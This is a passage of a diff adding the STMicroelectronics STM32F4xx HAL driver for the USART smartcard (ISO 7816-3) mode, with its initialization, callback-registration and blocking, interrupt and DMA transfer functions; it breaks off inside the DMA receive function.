MspDeInit. + + [..] + By default, after the HAL_SMARTCARD_Init() and when the state is HAL_SMARTCARD_STATE_RESET + all callbacks are set to the corresponding weak (surcharged) functions: + examples HAL_SMARTCARD_TxCpltCallback(), HAL_SMARTCARD_RxCpltCallback(). + Exception done for MspInit and MspDeInit functions that are respectively + reset to the legacy weak (surcharged) functions in the HAL_SMARTCARD_Init() + and HAL_SMARTCARD_DeInit() only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_SMARTCARD_Init() and HAL_SMARTCARD_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + [..] + Callbacks can be registered/unregistered in HAL_SMARTCARD_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_SMARTCARD_STATE_READY or HAL_SMARTCARD_STATE_RESET state, thus registered (user) + MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_SMARTCARD_RegisterCallback() before calling HAL_SMARTCARD_DeInit() + or HAL_SMARTCARD_Init() function. + + [..] + When The compilation define USE_HAL_SMARTCARD_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup SMARTCARD SMARTCARD + * @brief HAL SMARTCARD module driver + * @{ + */ +#ifdef HAL_SMARTCARD_MODULE_ENABLED +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup SMARTCARD_Private_Constants + * @{ + */ +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup SMARTCARD_Private_Functions + * @{ + */ +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) +void SMARTCARD_InitCallbacksToDefault(SMARTCARD_HandleTypeDef *hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACKS */ +static void SMARTCARD_EndTxTransfer(SMARTCARD_HandleTypeDef *hsc); +static void SMARTCARD_EndRxTransfer(SMARTCARD_HandleTypeDef *hsc); +static void SMARTCARD_SetConfig (SMARTCARD_HandleTypeDef *hsc); +static HAL_StatusTypeDef SMARTCARD_Transmit_IT(SMARTCARD_HandleTypeDef *hsc); +static HAL_StatusTypeDef SMARTCARD_EndTransmit_IT(SMARTCARD_HandleTypeDef *hsc); +static HAL_StatusTypeDef SMARTCARD_Receive_IT(SMARTCARD_HandleTypeDef *hsc); +static void SMARTCARD_DMATransmitCplt(DMA_HandleTypeDef *hdma); +static void SMARTCARD_DMAReceiveCplt(DMA_HandleTypeDef *hdma); +static void SMARTCARD_DMAError(DMA_HandleTypeDef *hdma); +static void SMARTCARD_DMAAbortOnError(DMA_HandleTypeDef *hdma); +static void SMARTCARD_DMATxAbortCallback(DMA_HandleTypeDef *hdma); +static void SMARTCARD_DMARxAbortCallback(DMA_HandleTypeDef *hdma); +static void SMARTCARD_DMATxOnlyAbortCallback(DMA_HandleTypeDef *hdma); +static void SMARTCARD_DMARxOnlyAbortCallback(DMA_HandleTypeDef *hdma); +static HAL_StatusTypeDef SMARTCARD_WaitOnFlagUntilTimeout(SMARTCARD_HandleTypeDef *hsc, uint32_t Flag, FlagStatus Status, uint32_t Tickstart, uint32_t Timeout); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup SMARTCARD_Exported_Functions SMARTCARD Exported Functions + * @{ + */ + +/** @defgroup SMARTCARD_Exported_Functions_Group1 SmartCard Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and Configuration functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to initialize the USART + in Smartcard mode. + [..] + The Smartcard interface is designed to support asynchronous protocol Smartcards as + defined in the ISO 7816-3 standard. + [..] + The USART can provide a clock to the smartcard through the SCLK output. + In smartcard mode, SCLK is not associated to the communication but is simply derived + from the internal peripheral input clock through a 5-bit prescaler. + [..] + (+) For the Smartcard mode only these parameters can be configured: + (++) Baud Rate + (++) Word Length => Should be 9 bits (8 bits + parity) + (++) Stop Bit + (++) Parity: => Should be enabled + (++) USART polarity + (++) USART phase + (++) USART LastBit + (++) Receiver/transmitter modes + (++) Prescaler + (++) GuardTime + (++) NACKState: The Smartcard NACK state + + (+) Recommended SmartCard interface configuration to get the Answer to Reset from the Card: + (++) Word Length = 9 Bits + (++) 1.5 Stop Bit + (++) Even parity + (++) BaudRate = 12096 baud + (++) Tx and Rx enabled + [..] + Please refer to the ISO 7816-3 specification for more details. + + [..] + (@) It is also possible to choose 0.5 stop bit for receiving but it is recommended + to use 1.5 stop bits for both transmitting and receiving to avoid switching + between the two configurations. + [..] + The HAL_SMARTCARD_Init() function follows the USART SmartCard configuration + procedures (details for the procedures are available in reference manual + (RM0430 for STM32F4X3xx MCUs and RM0402 for STM32F412xx MCUs + RM0383 for STM32F411xC/E MCUs and RM0401 for STM32F410xx MCUs + RM0090 for STM32F4X5xx/STM32F4X7xx/STM32F429xx/STM32F439xx MCUs + RM0390 for STM32F446xx MCUs and RM0386 for STM32F469xx/STM32F479xx MCUs)). + +@endverbatim + + The SMARTCARD frame format is given in the following table: + +-------------------------------------------------------------+ + | M bit | PCE bit | SMARTCARD frame | + |---------------------|---------------------------------------| + | 1 | 1 | | SB | 8 bit data | PB | STB | | + +-------------------------------------------------------------+ + * @{ + */ + +/** + * @brief Initializes the SmartCard mode according to the specified + * parameters in the SMARTCARD_InitTypeDef and create the associated handle. + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_Init(SMARTCARD_HandleTypeDef *hsc) +{ + /* Check the SMARTCARD handle allocation */ + if(hsc == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SMARTCARD_INSTANCE(hsc->Instance)); + assert_param(IS_SMARTCARD_NACK_STATE(hsc->Init.NACKState)); + + if(hsc->gState == HAL_SMARTCARD_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hsc->Lock = HAL_UNLOCKED; + +#if USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1 + SMARTCARD_InitCallbacksToDefault(hsc); + + if (hsc->MspInitCallback == NULL) + { + hsc->MspInitCallback = HAL_SMARTCARD_MspInit; + } + + /* Init the low level hardware */ + hsc->MspInitCallback(hsc); +#else + /* Init the low level hardware : GPIO, CLOCK */ + HAL_SMARTCARD_MspInit(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACKS */ + } + + hsc->gState = HAL_SMARTCARD_STATE_BUSY; + + /* Set the Prescaler */ + MODIFY_REG(hsc->Instance->GTPR, USART_GTPR_PSC, hsc->Init.Prescaler); + + /* Set the Guard Time */ + MODIFY_REG(hsc->Instance->GTPR, USART_GTPR_GT, ((hsc->Init.GuardTime)<<8U)); + + /* Set the Smartcard Communication parameters */ + SMARTCARD_SetConfig(hsc); + + /* In SmartCard mode, the following bits must be kept cleared: + - LINEN bit in the USART_CR2 register + - HDSEL and IREN bits in the USART_CR3 register.*/ + CLEAR_BIT(hsc->Instance->CR2, USART_CR2_LINEN); + CLEAR_BIT(hsc->Instance->CR3, (USART_CR3_IREN | USART_CR3_HDSEL)); + + /* Enable the SMARTCARD Parity Error Interrupt */ + SET_BIT(hsc->Instance->CR1, USART_CR1_PEIE); + + /* Enable the SMARTCARD Framing Error Interrupt */ + SET_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* Enable the Peripheral */ + __HAL_SMARTCARD_ENABLE(hsc); + + /* Configure the Smartcard NACK state */ + MODIFY_REG(hsc->Instance->CR3, USART_CR3_NACK, hsc->Init.NACKState); + + /* Enable the SC mode by setting the SCEN bit in the CR3 register */ + hsc->Instance->CR3 |= (USART_CR3_SCEN); + + /* Initialize the SMARTCARD state*/ + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + hsc->gState= HAL_SMARTCARD_STATE_READY; + hsc->RxState= HAL_SMARTCARD_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the USART SmartCard peripheral + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_DeInit(SMARTCARD_HandleTypeDef *hsc) +{ + /* Check the SMARTCARD handle allocation */ + if(hsc == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SMARTCARD_INSTANCE(hsc->Instance)); + + hsc->gState = HAL_SMARTCARD_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_SMARTCARD_DISABLE(hsc); + + /* DeInit the low level hardware */ +#if USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1 + if (hsc->MspDeInitCallback == NULL) + { + hsc->MspDeInitCallback = HAL_SMARTCARD_MspDeInit; + } + /* DeInit the low level hardware */ + hsc->MspDeInitCallback(hsc); +#else + HAL_SMARTCARD_MspDeInit(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACKS */ + + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + hsc->gState = HAL_SMARTCARD_STATE_RESET; + hsc->RxState = HAL_SMARTCARD_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hsc); + + return HAL_OK; +} + +/** + * @brief SMARTCARD MSP Init + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval None + */ +__weak void HAL_SMARTCARD_MspInit(SMARTCARD_HandleTypeDef *hsc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMARTCARD_MspInit can be implemented in the user file + */ +} + +/** + * @brief SMARTCARD MSP DeInit + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval None + */ +__weak void HAL_SMARTCARD_MspDeInit(SMARTCARD_HandleTypeDef *hsc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMARTCARD_MspDeInit can be implemented in the user file + */ +} + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User SMARTCARD Callback + * To be used instead of the weak predefined callback + * @param hsc smartcard handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_SMARTCARD_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_SMARTCARD_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_SMARTCARD_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_SMARTCARD_ABORT_COMPLETE_CB_ID Abort Complete Callback ID + * @arg @ref HAL_SMARTCARD_ABORT_TRANSMIT_COMPLETE_CB_ID Abort Transmit Complete Callback ID + * @arg @ref HAL_SMARTCARD_ABORT_RECEIVE_COMPLETE_CB_ID Abort Receive Complete Callback ID + * @arg @ref HAL_SMARTCARD_MSPINIT_CB_ID MspInit Callback ID + * @arg @ref HAL_SMARTCARD_MSPDEINIT_CB_ID MspDeInit Callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_RegisterCallback(SMARTCARD_HandleTypeDef *hsc, HAL_SMARTCARD_CallbackIDTypeDef CallbackID, pSMARTCARD_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hsc); + + if (hsc->gState == HAL_SMARTCARD_STATE_READY) + { + switch (CallbackID) + { + + case HAL_SMARTCARD_TX_COMPLETE_CB_ID : + hsc->TxCpltCallback = pCallback; + break; + + case HAL_SMARTCARD_RX_COMPLETE_CB_ID : + hsc->RxCpltCallback = pCallback; + break; + + case HAL_SMARTCARD_ERROR_CB_ID : + hsc->ErrorCallback = pCallback; + break; + + case HAL_SMARTCARD_ABORT_COMPLETE_CB_ID : + hsc->AbortCpltCallback = pCallback; + break; + + case HAL_SMARTCARD_ABORT_TRANSMIT_COMPLETE_CB_ID : + hsc->AbortTransmitCpltCallback = pCallback; + break; + + case HAL_SMARTCARD_ABORT_RECEIVE_COMPLETE_CB_ID : + hsc->AbortReceiveCpltCallback = pCallback; + break; + + + case HAL_SMARTCARD_MSPINIT_CB_ID : + hsc->MspInitCallback = pCallback; + break; + + case HAL_SMARTCARD_MSPDEINIT_CB_ID : + hsc->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hsc->gState == HAL_SMARTCARD_STATE_RESET) + { + switch (CallbackID) + { + case HAL_SMARTCARD_MSPINIT_CB_ID : + hsc->MspInitCallback = pCallback; + break; + + case HAL_SMARTCARD_MSPDEINIT_CB_ID : + hsc->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsc); + + return status; +} + +/** + * @brief Unregister an SMARTCARD callback + * SMARTCARD callback is redirected to the weak predefined callback + * @param hsc smartcard handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_SMARTCARD_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_SMARTCARD_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_SMARTCARD_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_SMARTCARD_ABORT_COMPLETE_CB_ID Abort Complete Callback ID + * @arg @ref HAL_SMARTCARD_ABORT_TRANSMIT_COMPLETE_CB_ID Abort Transmit Complete Callback ID + * @arg @ref HAL_SMARTCARD_ABORT_RECEIVE_COMPLETE_CB_ID Abort Receive Complete Callback ID + * @arg @ref HAL_SMARTCARD_MSPINIT_CB_ID MspInit Callback ID + * @arg @ref HAL_SMARTCARD_MSPDEINIT_CB_ID MspDeInit Callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_UnRegisterCallback(SMARTCARD_HandleTypeDef *hsc, HAL_SMARTCARD_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hsc); + + if (HAL_SMARTCARD_STATE_READY == hsc->gState) + { + switch (CallbackID) + { + case HAL_SMARTCARD_TX_COMPLETE_CB_ID : + hsc->TxCpltCallback = HAL_SMARTCARD_TxCpltCallback; /* Legacy weak TxCpltCallback */ + break; + + case HAL_SMARTCARD_RX_COMPLETE_CB_ID : + hsc->RxCpltCallback = HAL_SMARTCARD_RxCpltCallback; /* Legacy weak RxCpltCallback */ + break; + + case HAL_SMARTCARD_ERROR_CB_ID : + hsc->ErrorCallback = HAL_SMARTCARD_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_SMARTCARD_ABORT_COMPLETE_CB_ID : + hsc->AbortCpltCallback = HAL_SMARTCARD_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + break; + + case HAL_SMARTCARD_ABORT_TRANSMIT_COMPLETE_CB_ID : + hsc->AbortTransmitCpltCallback = HAL_SMARTCARD_AbortTransmitCpltCallback; /* Legacy weak AbortTransmitCpltCallback */ + break; + + case HAL_SMARTCARD_ABORT_RECEIVE_COMPLETE_CB_ID : + hsc->AbortReceiveCpltCallback = HAL_SMARTCARD_AbortReceiveCpltCallback; /* Legacy weak AbortReceiveCpltCallback */ + break; + + + case HAL_SMARTCARD_MSPINIT_CB_ID : + hsc->MspInitCallback = HAL_SMARTCARD_MspInit; /* Legacy weak MspInitCallback */ + break; + + case HAL_SMARTCARD_MSPDEINIT_CB_ID : + hsc->MspDeInitCallback = HAL_SMARTCARD_MspDeInit; /* Legacy weak MspDeInitCallback */ + break; + + default : + /* Update the error code */ + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_SMARTCARD_STATE_RESET == hsc->gState) + { + switch (CallbackID) + { + case HAL_SMARTCARD_MSPINIT_CB_ID : + hsc->MspInitCallback = HAL_SMARTCARD_MspInit; + break; + + case HAL_SMARTCARD_MSPDEINIT_CB_ID : + hsc->MspDeInitCallback = HAL_SMARTCARD_MspDeInit; + break; + + default : + /* Update the error code */ + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsc); + + return status; +} +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup SMARTCARD_Exported_Functions_Group2 IO operation functions + * @brief SMARTCARD Transmit and Receive functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the SMARTCARD data transfers. + + [..] + (#) Smartcard is a single wire half duplex communication protocol. + The Smartcard interface is designed to support asynchronous protocol Smartcards as + defined in the ISO 7816-3 standard. + (#) The USART should be configured as: + (++) 8 bits plus parity: where M=1 and PCE=1 in the USART_CR1 register + (++) 1.5 stop bits when transmitting and receiving: where STOP=11 in the USART_CR2 register. + + (#) There are two modes of transfer: + (++) Blocking mode: The communication is performed in polling mode. + The HAL status of all data processing is returned by the same function + after finishing transfer. + (++) Non Blocking mode: The communication is performed using Interrupts + or DMA, These APIs return the HAL status. + The end of the data processing will be indicated through the + dedicated SMARTCARD IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + The HAL_SMARTCARD_TxCpltCallback(), HAL_SMARTCARD_RxCpltCallback() user callbacks + will be executed respectively at the end of the Transmit or Receive process + The HAL_SMARTCARD_ErrorCallback() user callback will be executed when a communication error is detected + + (#) Blocking mode APIs are : + (++) HAL_SMARTCARD_Transmit() + (++) HAL_SMARTCARD_Receive() + + (#) Non Blocking mode APIs with Interrupt are : + (++) HAL_SMARTCARD_Transmit_IT() + (++) HAL_SMARTCARD_Receive_IT() + (++) HAL_SMARTCARD_IRQHandler() + + (#) Non Blocking mode functions with DMA are : + (++) HAL_SMARTCARD_Transmit_DMA() + (++) HAL_SMARTCARD_Receive_DMA() + + (#) A set of Transfer Complete Callbacks are provided in non Blocking mode: + (++) HAL_SMARTCARD_TxCpltCallback() + (++) HAL_SMARTCARD_RxCpltCallback() + (++) HAL_SMARTCARD_ErrorCallback() + + (#) Non-Blocking mode transfers could be aborted using Abort API's : + (+) HAL_SMARTCARD_Abort() + (+) HAL_SMARTCARD_AbortTransmit() + (+) HAL_SMARTCARD_AbortReceive() + (+) HAL_SMARTCARD_Abort_IT() + (+) HAL_SMARTCARD_AbortTransmit_IT() + (+) HAL_SMARTCARD_AbortReceive_IT() + + (#) For Abort services based on interrupts (HAL_SMARTCARD_Abortxxx_IT), a set of Abort Complete Callbacks are provided: + (+) HAL_SMARTCARD_AbortCpltCallback() + (+) HAL_SMARTCARD_AbortTransmitCpltCallback() + (+) HAL_SMARTCARD_AbortReceiveCpltCallback() + + (#) In Non-Blocking mode transfers, possible errors are split into 2 categories. + Errors are handled as follows : + (+) Error is considered as Recoverable and non blocking : Transfer could go till end, but error severity is + to be evaluated by user : this concerns Frame Error, Parity Error or Noise Error in Interrupt mode reception . + Received character is then retrieved and stored in Rx buffer, Error code is set to allow user to identify error type, + and HAL_SMARTCARD_ErrorCallback() user callback is executed. Transfer is kept ongoing on SMARTCARD side. + If user wants to abort it, Abort services should be called by user. + (+) Error is considered as Blocking : Transfer could not be completed properly and is aborted. + This concerns Frame Error in Interrupt mode transmission, Overrun Error in Interrupt mode reception and all errors in DMA mode. + Error code is set to allow user to identify error type, and HAL_SMARTCARD_ErrorCallback() user callback is executed. + +@endverbatim + * @{ + */ + +/** + * @brief Send an amount of data in blocking mode + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_Transmit(SMARTCARD_HandleTypeDef *hsc, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint8_t *tmp = pData; + uint32_t tickstart = 0U; + + if(hsc->gState == HAL_SMARTCARD_STATE_READY) + { + if((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsc); + + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + hsc->gState = HAL_SMARTCARD_STATE_BUSY_TX; + + /* Init tickstart for timeout management */ + tickstart = HAL_GetTick(); + + hsc->TxXferSize = Size; + hsc->TxXferCount = Size; + while(hsc->TxXferCount > 0U) + { + hsc->TxXferCount--; + if(SMARTCARD_WaitOnFlagUntilTimeout(hsc, SMARTCARD_FLAG_TXE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + hsc->Instance->DR = (uint8_t)(*tmp & 0xFFU); + tmp++; + } + + if(SMARTCARD_WaitOnFlagUntilTimeout(hsc, SMARTCARD_FLAG_TC, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* At end of Tx process, restore hsc->gState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsc); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in blocking mode + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be received + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_Receive(SMARTCARD_HandleTypeDef *hsc, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint8_t *tmp = pData; + uint32_t tickstart = 0U; + + if(hsc->RxState == HAL_SMARTCARD_STATE_READY) + { + if((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsc); + + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + hsc->RxState = HAL_SMARTCARD_STATE_BUSY_RX; + + /* Init tickstart for timeout management */ + tickstart = HAL_GetTick(); + + hsc->RxXferSize = Size; + hsc->RxXferCount = Size; + + /* Check the remain data to be received */ + while(hsc->RxXferCount > 0U) + { + hsc->RxXferCount--; + if(SMARTCARD_WaitOnFlagUntilTimeout(hsc, SMARTCARD_FLAG_RXNE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + *tmp = (uint8_t)(hsc->Instance->DR & (uint8_t)0xFFU); + tmp++; + } + + /* At end of Rx process, restore hsc->RxState to Ready */ + hsc->RxState = HAL_SMARTCARD_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsc); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Send an amount of data in non blocking mode + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_Transmit_IT(SMARTCARD_HandleTypeDef *hsc, uint8_t *pData, uint16_t Size) +{ + /* Check that a Tx process is not already ongoing */ + if(hsc->gState == HAL_SMARTCARD_STATE_READY) + { + if((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsc); + + hsc->pTxBuffPtr = pData; + hsc->TxXferSize = Size; + hsc->TxXferCount = Size; + + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + hsc->gState = HAL_SMARTCARD_STATE_BUSY_TX; + + /* Process Unlocked */ + __HAL_UNLOCK(hsc); + + /* Enable the SMARTCARD Parity Error Interrupt */ + SET_BIT(hsc->Instance->CR1, USART_CR1_PEIE); + + /* Disable the SMARTCARD Error Interrupt: (Frame error, noise error, overrun error) */ + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* Enable the SMARTCARD Transmit data register empty Interrupt */ + SET_BIT(hsc->Instance->CR1, USART_CR1_TXEIE); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in non blocking mode + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be received + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_Receive_IT(SMARTCARD_HandleTypeDef *hsc, uint8_t *pData, uint16_t Size) +{ + /* Check that a Rx process is not already ongoing */ + if(hsc->RxState == HAL_SMARTCARD_STATE_READY) + { + if((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsc); + + hsc->pRxBuffPtr = pData; + hsc->RxXferSize = Size; + hsc->RxXferCount = Size; + + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + hsc->RxState = HAL_SMARTCARD_STATE_BUSY_RX; + + /* Process Unlocked */ + __HAL_UNLOCK(hsc); + + /* Enable the SMARTCARD Parity Error and Data Register not empty Interrupts */ + SET_BIT(hsc->Instance->CR1, USART_CR1_PEIE| USART_CR1_RXNEIE); + + /* Enable the SMARTCARD Error Interrupt: (Frame error, noise error, overrun error) */ + SET_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Send an amount of data in non blocking mode + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_Transmit_DMA(SMARTCARD_HandleTypeDef *hsc, uint8_t *pData, uint16_t Size) +{ + uint32_t *tmp; + + /* Check that a Tx process is not already ongoing */ + if(hsc->gState == HAL_SMARTCARD_STATE_READY) + { + if((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsc); + + hsc->pTxBuffPtr = pData; + hsc->TxXferSize = Size; + hsc->TxXferCount = Size; + + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + hsc->gState = HAL_SMARTCARD_STATE_BUSY_TX; + + /* Set the SMARTCARD DMA transfer complete callback */ + hsc->hdmatx->XferCpltCallback = SMARTCARD_DMATransmitCplt; + + /* Set the DMA error callback */ + hsc->hdmatx->XferErrorCallback = SMARTCARD_DMAError; + + /* Set the DMA abort callback */ + hsc->hdmatx->XferAbortCallback = NULL; + + /* Enable the SMARTCARD transmit DMA stream */ + tmp = (uint32_t*)&pData; + HAL_DMA_Start_IT(hsc->hdmatx, *(uint32_t*)tmp, (uint32_t)&hsc->Instance->DR, Size); + + /* Clear the TC flag in the SR register by writing 0 to it */ + __HAL_SMARTCARD_CLEAR_FLAG(hsc, SMARTCARD_FLAG_TC); + + /* Process Unlocked */ + __HAL_UNLOCK(hsc); + + /* Enable the DMA transfer for transmit request by setting the DMAT bit + in the SMARTCARD CR3 register */ + SET_BIT(hsc->Instance->CR3, USART_CR3_DMAT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in non blocking mode + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be received + * @note When the SMARTCARD parity is enabled (PCE = 1) the data received contain the parity bit.s + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMARTCARD_Receive_DMA(SMARTCARD_HandleTypeDef *hsc, uint8_t *pData, uint16_t Size) +{ + uint32_t *tmp; + + /* Check that a Rx process is not already ongoing */ + if(hsc->RxState == HAL_SMARTCARD_STATE_READY) + { + if((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsc); + + hsc->pRxBuffPtr = pData; + hsc->RxXferSize = Size; + + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + hsc->RxState = HAL_SMARTCARD_STATE_BUSY_RX; + + /* Set the SMARTCARD DMA transfer complete callback */ + hsc->hdmarx->XferCpltCallback = SMARTCARD_DMAReceiveCplt; + + /* Set the DMA error callback */ + hsc->hdmarx->XferErrorCallback = SMARTCARD_DMAError; + + /* Set the DMA abort callback */ + hsc->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + tmp = (uint32_t*)&pData; + 